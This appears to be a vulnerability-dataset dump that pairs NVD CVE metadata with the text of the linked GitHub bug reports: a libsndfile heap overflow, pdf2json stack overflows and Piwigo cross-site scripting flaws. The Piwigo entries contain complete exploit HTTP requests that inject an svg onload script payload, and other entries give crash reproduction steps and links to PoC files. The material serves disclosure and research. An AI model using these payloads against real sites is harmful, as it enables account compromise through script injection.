(std::runtime_error const& e) { std::cerr << e.what() << std::endl; } } void FuzzHelper::testWrite() { // Write in various ways to exercise QPDFWriter PointerHolder<QPDF> q; PointerHolder<QPDFWriter> w; q = getQpdf(); w = getWriter(q); w->setDeterministicID(true); w->setQDFMode(true); doWrite(w); q = getQpdf(); w = getWriter(q); w->setStaticID(true); w->setLinearization(true); w->setR6EncryptionParameters( "u", "o", true, true, true, true, true, true, qpdf_r3p_full, true); doWrite(w); q = getQpdf(); w = getWriter(q); w->setStaticID(true); w->setObjectStreamMode(qpdf_o_disable); w->setR3EncryptionParameters( "u", "o", true, true, qpdf_r3p_full, qpdf_r3m_all); doWrite(w); q = getQpdf(); w = getWriter(q); w->setDeterministicID(true); w->setObjectStreamMode(qpdf_o_generate); w->setLinearization(true); doWrite(w); } void FuzzHelper::testPages() { // Parse all content streams, and exercise some helpers that // operate on pages. PointerHolder<QPDF> q = getQpdf(); QPDFPageDocumentHelper pdh(*q); QPDFPageLabelDocumentHelper pldh(*q); QPDFOutlineDocumentHelper odh(*q); QPDFAcroFormDocumentHelper afdh(*q); afdh.generateAppearancesIfNeeded(); pdh.flattenAnnotations(); std::vector<QPDFPageObjectHelper> pages = pdh.getAllPages(); DiscardContents discard_contents; int pageno = 0; for (std::vector<QPDFPageObjectHelper>::iterator iter = pages.begin(); iter != pages.end(); ++iter) { QPDFPageObjectHelper& page(*iter); ++pageno; try { page.coalesceContentStreams(); page.parsePageContents(&discard_contents); page.getPageImages(); pldh.getLabelForPage(pageno); QPDFObjectHandle page_obj(page.getObjectHandle()); page_obj.getJSON(true).unparse(); odh.getOutlinesForPage(page_obj.getObjGen()); std::vector<QPDFAnnotationObjectHelper> annotations = afdh.getWidgetAnnotationsForPage(page); for (std::vector<QPDFAnnotationObjectHelper>::iterator annot_iter = annotations.begin(); annot_iter != annotations.end(); ++annot_iter) { QPDFAnnotationObjectHelper& aoh = *annot_iter; afdh.getFieldForAnnotation(aoh); } } catch (QPDFExc& e) { std::cerr << "page " << pageno << ": " << e.what() << std::endl; } } } void FuzzHelper::testOutlines() { PointerHolder<QPDF> q = getQpdf(); std::list<std::vector<QPDFOutlineObjectHelper> > queue; QPDFOutlineDocumentHelper odh(*q); queue.push_back(odh.getTopLevelOutlines()); while (! queue.empty()) { std::vector<QPDFOutlineObjectHelper>& outlines = *(queue.begin()); for (std::vector<QPDFOutlineObjectHelper>::iterator iter = outlines.begin(); iter != outlines.end(); ++iter) { QPDFOutlineObjectHelper& ol = *iter; ol.getDestPage(); queue.push_back(ol.getKids()); } queue.pop_front(); } } void FuzzHelper::doChecks() { // Get as much coverage as possible in parts of the library that // might benefit from fuzzing. testWrite(); testPages(); testOutlines(); } void FuzzHelper::run() { // The goal here is that you should be able to throw anything at // libqpdf and it will respond without any memory errors and never // do anything worse than throwing a QPDFExc or // std::runtime_error. Throwing any other kind of exception, // segfaulting, or having a memory error (when built with // appropriate sanitizers) will all cause abnormal exit. try { doChecks(); } catch (QPDFExc const& e) { std::cerr << "QPDFExc: " << e.what() << std::endl; } catch (std::runtime_error const& e) { std::cerr << "runtime_error: " << e.what() << std::endl; } } int main(int argc, char** argv){ if (argc < 2){ std::cerr << "Please input the processed file!\n"; } FuzzHelper f(argv[1]); f.run(); return 0; } ``` The PoC file is attached: [poc.zip](https://github.com/qpdf/qpdf/files/5734179/poc.zip)
Heap-use-after-free in `Pl_ASCII85Decoder::write`
https://api.github.com/repos/qpdf/qpdf/issues/492/comments
2
2020-12-23T08:51:13Z
2021-01-05T20:52:52Z
https://github.com/qpdf/qpdf/issues/492
773,592,991
492
2,208
CVE-2021-3246
2021-07-20T15:15:11.053
A heap buffer overflow vulnerability in msadpcm_decode_block of libsndfile 1.0.30 allows attackers to execute arbitrary code via a crafted WAV file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libsndfile/libsndfile/issues/687" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00024.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DLUDCEMMPRA3IYYYHVZUOUZXI65FU37V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T7LNW4AVDVL3BU3N3KGVFLTYFASBVCIF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202309-11" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libsndfile/libsndfile/issues/687" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DLUDCEMMPRA3IYYYHVZUOUZXI65FU37V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T7LNW4AVDVL3BU3N3KGVFLTYFASBVCIF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202309-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4947" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsndfile_project:libsndfile:1.0.30:*:*:*:*:*:*:*", "matchCriteriaId": "35A57536-5B23-4FC4-9860-0E30943E41BD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libsndfile/libsndfile/issues/687
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "libsndfile", "libsndfile" ]
Hi, fuzzing sndfile-info with AFL++ I found a heap-buffer-overflow in in msadpcm_decode_block /home/andreaf/real/libsndfile/src/ms_adpcm.c:279 I'm on an x86-64 Ubuntu 20.04 with Clang 10. The AddressSanitizer report is the following: ``` ================================================================= ==24888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000001238 at pc 0x0000005ebedc bp 0x7ffced651bd0 sp 0x7ffced651bc8 WRITE of size 2 at 0x621000001238 thread T0 #0 0x5ebedb in msadpcm_decode_block /home/andreaf/libsndfile/src/ms_adpcm.c:279:31 #1 0x5e9cf8 in wavlike_msadpcm_init /home/andreaf/libsndfile/src/ms_adpcm.c:171:3 #2 0x566da9 in wav_open /home/andreaf/libsndfile/src/wav.c:258:14 #3 0x4cc6d2 in psf_open_file /home/andreaf/libsndfile/src/sndfile.c:3080:13 #4 0x4caa5e in sf_open /home/andreaf/libsndfile/src/sndfile.c:359:9 #5 0x4c57dd in cart_dump /home/andreaf/libsndfile/programs/sndfile-info.c:479:14 #6 0x4c36c3 in main /home/andreaf/libsndfile/programs/sndfile-info.c:96:13 #7 0x7f114ca61bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x41b4c9 in _start (/home/andreaf/libsndfile/programs/sndfile-info+0x41b4c9) 0x621000001238 is located 0 bytes to the right of 4408-byte region [0x621000000100,0x621000001238) allocated by thread T0 here: #0 0x493d82 in calloc (/home/andreaf/libsndfile/programs/sndfile-info+0x493d82) #1 0x5e90b4 in wavlike_msadpcm_init /home/andreaf/libsndfile/src/ms_adpcm.c:138:27 #2 0x566da9 in wav_open /home/andreaf/libsndfile/src/wav.c:258:14 #3 0x4cc6d2 in psf_open_file /home/andreaf/libsndfile/src/sndfile.c:3080:13 #4 0x4caa5e in sf_open /home/andreaf/libsndfile/src/sndfile.c:359:9 #5 0x4c57dd in cart_dump /home/andreaf/libsndfile/programs/sndfile-info.c:479:14 #6 0x4c36c3 in main /home/andreaf/libsndfile/programs/sndfile-info.c:96:13 #7 0x7f114ca61bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/andreaf/libsndfile/src/ms_adpcm.c:279:31 in msadpcm_decode_block Shadow bytes around the buggy address: 0x0c427fff81f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff8240: 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa 0x0c427fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==24888==ABORTING ``` To reproduce on git master: ``` export CC='clang-10 -fsanitize=address' export CFLAGS='-g' ./configure --disable-shared make ./programs/sndfile-info --cart ./sndfile_heap_overflow ``` The testcase that triggers the bug is (decompress it before): [sndfile_heap_overflow.tar.gz](https://github.com/libsndfile/libsndfile/files/5819990/sndfile_heap_overflow.tar.gz)
heap-buffer-overflow in in msadpcm_decode_block
https://api.github.com/repos/libsndfile/libsndfile/issues/687/comments
22
2021-01-15T10:43:55Z
2022-01-19T03:37:53Z
https://github.com/libsndfile/libsndfile/issues/687
786,794,938
687
2,209
CVE-2020-22148
2021-07-21T17:15:08.123
A stored cross site scripting (XSS) vulnerability in /admin.php?page=tags of Piwigo 2.10.1 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1157" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1157" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1157
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi team, I just found a stored XSS in `admin.php?page=tags`. Exploit Request : ``` POST /piwigo/piwigo/admin.php?page=tags HTTP/1.1 Host: 192.168.10.138 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://192.168.10.138 Connection: close Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=tags Cookie: pwg_id=kikufgh78rp553s266q6r0sj62 Upgrade-Insecure-Requests: 1 pwg_token=c8dea9237930ccb48c6d1a4e5020b32b&add_tag=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&add=Submit ``` PoC: ![](https://i.imgur.com/cEyHOyq.png)
Stored Cross Site Scripting in /admin.php?page=tags
https://api.github.com/repos/Piwigo/Piwigo/issues/1157/comments
4
2020-02-12T02:40:57Z
2021-12-07T11:25:00Z
https://github.com/Piwigo/Piwigo/issues/1157
563,700,554
1,157
2,210
CVE-2020-22150
2021-07-21T17:15:08.167
A cross site scripting (XSS) vulnerability in /admin.php?page=permalinks of Piwigo 2.10.1 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1158
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi team! I found a XSS in XSS in /admin.php?page=permalinks Exploit Request: ``` POST /piwigo/piwigo/admin.php?page=permalinks HTTP/1.1 Host: 192.168.10.138 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 138 Origin: http://192.168.10.138 Connection: close Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=permalinks Cookie: pwg_id=ragm92nc6a3rr532fi0h9h6f21 Upgrade-Insecure-Requests: 1 cat_id=3&permalink=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&save=on&set_permalink=Submit&pwg_token=2048f9dd482aaca003e193045fd4f763 ``` PoC: ![](https://i.imgur.com/MtpbJZA.png) ![](https://i.imgur.com/OTEVWml.png)
XSS in /admin.php?page=permalinks
https://api.github.com/repos/Piwigo/Piwigo/issues/1158/comments
3
2020-02-12T03:32:27Z
2021-12-07T11:25:28Z
https://github.com/Piwigo/Piwigo/issues/1158
563,727,063
1,158
2,211
CVE-2020-19463
2021-07-21T18:15:08.467
An issue has been found in function vfprintf in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/770.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/770.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/flexpaper/pdf2json/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to a stack overflow bug on the function vfprintf (the latest commit b671b64 on master - version 0.70). PoC_so_vfprintf: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_so_vfprintf Valgrind says: ~~~ valgrind pdf2json PoC_so_vfprintf /dev/null ==8530== Memcheck, a memory error detector ==8530== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==8530== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==8530== Command: ./pdf2json PoC_so_vfprintf /dev/null ==8530== Error: PDF file is damaged - attempting to reconstruct xref table... Error (13719): Illegal character <8e> in hex string Error (13778): Illegal character <db> in hex string Error (13781): Illegal character <94> in hex string Error (13782): Illegal character <02> in hex string Error (13783): Illegal character <a2> in hex string Error: End of file inside array Error: End of file inside dictionary Error (193): Illegal character '>' Error (195): Dictionary key must be a name object Error (203): Dictionary key must be a name object Error (229): Dictionary key must be a name object Error (232): Dictionary key must be a name object Error (491): Illegal character <01> in hex string Error (496): Illegal character <6e> in hex string Error (498): Illegal character <6f> in hex string Error (500): Illegal character <6a> in hex string Error (506): Illegal character <6f> in hex string Error (508): Illegal character <6a> in hex string Error (510): Illegal character <3c> in hex string Error (511): Illegal character <3c> in hex string Error (513): Illegal character <2f> in hex string ... Error (8023): Dictionary key must be a name object ==8530== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==8530== ==8530== Process terminating with default action of signal 11 (SIGSEGV) ==8530== Access not within mapped region at address 0xFFE801FF8 ==8530== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==8530== at 0x5756642: _IO_default_xsputn (genops.c:422) ==8530== If you believe this happened as a result of a stack ==8530== overflow in your program's main thread (unlikely but ==8530== possible), you can try to increase the size of the ==8530== main thread stack using the --main-stacksize= flag. ==8530== The main thread stack size used in this run was 8388608. ==8530== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==8530== ==8530== Process terminating with default action of signal 11 (SIGSEGV) ==8530== Access not within mapped region at address 0xFFE801FF0 ==8530== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==8530== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) ==8530== If you believe this happened as a result of a stack ==8530== overflow in your program's main thread (unlikely but ==8530== possible), you can try to increase the size of the ==8530== main thread stack using the --main-stacksize= flag. ==8530== The main thread stack size used in this run was 8388608. ==8530== ==8530== HEAP SUMMARY: ==8530== in use at exit: 15,497,401 bytes in 256,831 blocks ==8530== total heap usage: 435,600 allocs, 178,769 frees, 16,602,462 bytes allocated ==8530== ==8530== LEAK SUMMARY: ==8530== definitely lost: 0 bytes in 0 blocks ==8530== indirectly lost: 0 bytes in 0 blocks ==8530== possibly lost: 0 bytes in 0 blocks ==8530== still reachable: 15,497,401 bytes in 256,831 blocks ==8530== suppressed: 0 bytes in 0 blocks ==8530== Rerun with --leak-check=full to see details of leaked memory ==8530== ==8530== For counts of detected and suppressed errors, rerun with: -v ==8530== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV (stack overflow) on vfprintf
https://api.github.com/repos/flexpaper/pdf2json/issues/24/comments
0
2019-05-27T22:42:03Z
2019-05-29T17:40:53Z
https://github.com/flexpaper/pdf2json/issues/24
449,005,412
24
2,212
CVE-2020-19464
2021-07-21T18:15:08.507
An issue has been found in function XRef::fetch in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a stack overflow .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/770.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/770.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/flexpaper/pdf2json/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to a stack overflow bug on the function XRef::fetch (the latest commit b671b64 on master - version 0.70). PoC_so_XRef::fetch: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_so_XRef::fetch Valgrind says: ~~~ valgrind pdf2json PoC_so_XRef\:\:fetch /dev/null ==17786== Memcheck, a memory error detector ==17786== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==17786== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==17786== Command: ./pdf2json PoC_so_XRef::fetch /dev/null ==17786== ==17786== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==17786== ==17786== Process terminating with default action of signal 11 (SIGSEGV) ==17786== Access not within mapped region at address 0xFFE801FF8 ==17786== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==17786== at 0x4090A2: Object::Object() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43F7AB: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43CE5B: ObjectStream::ObjectStream(XRef*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43FB1F: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43CE5B: ObjectStream::ObjectStream(XRef*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43FB1F: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43CE5B: 